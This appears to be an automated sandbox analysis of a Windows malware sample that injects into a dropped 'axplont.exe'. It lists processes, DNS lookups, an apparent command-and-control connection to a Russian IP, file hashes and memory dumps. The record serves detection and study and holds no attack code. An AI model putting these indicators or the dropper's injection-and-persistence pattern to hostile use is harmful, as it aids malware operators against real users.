Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1580 wrote to memory of 3100 | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe |
| PID 1580 wrote to memory of 3100 | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe |
| PID 1580 wrote to memory of 3100 | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4328,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| BE | 2.17.107.131:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 131.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
Files
memory/1580-0-0x0000000000B70000-0x0000000001003000-memory.dmp
memory/1580-1-0x0000000077834000-0x0000000077836000-memory.dmp
memory/1580-2-0x0000000000B71000-0x0000000000B9F000-memory.dmp
memory/1580-3-0x0000000000B70000-0x0000000001003000-memory.dmp
memory/1580-5-0x0000000000B70000-0x0000000001003000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
| MD5 | 3eaecc080bd77a152119127af73707b3 |
| SHA1 | 71222b5b8c9984814390709d267be019a95ab4b6 |
| SHA256 | fbe40f767788ac5d1b503e9b639711db6152a0b5e623d131b05381f02de957b1 |
| SHA512 | a9d9dcd5f743812adf0b9b880ea334a6301d5d6b33f97e48dc9f3c397640b189bb1d34137ad7c23f45faaed398c44e9e55fd85368a6061980973efc73aae19ec |
memory/3100-18-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/1580-17-0x0000000000B70000-0x0000000001003000-memory.dmp
memory/3100-19-0x0000000000F71000-0x0000000000F9F000-memory.dmp
memory/3100-20-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-21-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-22-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-23-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-24-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-25-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-26-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-27-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-28-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3968-30-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3968-31-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3968-32-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3968-33-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-34-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-35-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-36-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-37-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-38-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-39-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3156-41-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-42-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-43-0x0000000000F70000-0x0000000001403000-memory.dmp
memory/3100-44-0x0000000000F70000-0x0000000001403000-memory.dmp